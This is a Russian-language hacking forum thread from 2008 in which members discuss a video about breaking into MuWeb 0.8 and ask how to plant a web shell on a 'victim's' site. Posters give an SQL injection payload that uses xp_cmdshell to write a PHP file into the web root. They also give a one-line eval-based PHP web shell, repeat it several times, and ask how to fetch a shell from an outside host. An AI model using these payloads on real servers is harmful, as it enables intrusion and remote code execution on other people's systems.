Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Video.Antichat (https://forum.antichat.xyz/forumdisplay.php?f=22)
-   -   [Видео] Взлом MuWeb 0.8 (https://forum.antichat.xyz/showthread.php?t=71632)

Ponchik 26.05.2008 22:28

[Видео] Взлом MuWeb 0.8
 
Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause :)

Код:

http://www.sharemania.ru/0226098
Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит :)
P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить

Dimi4 26.05.2008 23:15

Молодец пончик. Так держать. Может и в моа возьмут :)

Ronny 16.06.2008 16:55

Цитата:

Сообщение от Ponchik
Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause :)

Код:

http://www.sharemania.ru/0226098
Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит :)
P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить

Ета команда показавает всю инфу о ПХП :
PHP код:

'; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';--

А что надо прописать, чтобы отсюда -> http://globnet.oo.lv/shell.php загрузить шелл на сайт жертвы ???

Ponchik 17.06.2008 12:23

Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш

NooB1k 17.06.2008 12:38

Круто. 10\10. Можно вопрос я За шол на какойто му в админку сам узнал как заходить не повторял как у тебя.Когда я хочу что там сменит меня снова выкидывает в админку в начало и не меняется,что делать? обращаюсь к тебе т.к ты понимаешь в этом деле.

Sn@k3 17.06.2008 12:56

ну впринцыпе ничего фантастического, но вопрос, как ты нашел багу, где в админку не пускает тупо только алертом =)))) за это молодец.

Ronny 17.06.2008 16:51

Цитата:

Сообщение от Ponchik
Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш

Ну вот...как ето понять
PHP код:

<? stripslashes(eval($_GET[c])); ?>

Тут понятнее
PHP код:

'; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:AppServ/www/shell.php;--

Цитата:

C:AppServ/www/shell.php
понятно куда заливаешь, и в какой фаил :)

Цитата:

"<? stripslashes(eval($_GET[c])); ?>" > C:AppServ/www/shell.php;--
может быть так :confused: и куда свой сайт вписовать (откуда шелл закачивать надо) ?

NooB1k 18.06.2008 13:01

Ronny,тебе сказали уже куда и как,я всё понял с 1 раза.Хоть я это не знал!

Ronny 19.06.2008 15:03

Ну может обясниш...мне тупому человеку ???

NooB1k 19.06.2008 18:13

<? stripslashes(eval($_GET[c])); ?> stripslashes()


Время: 14:51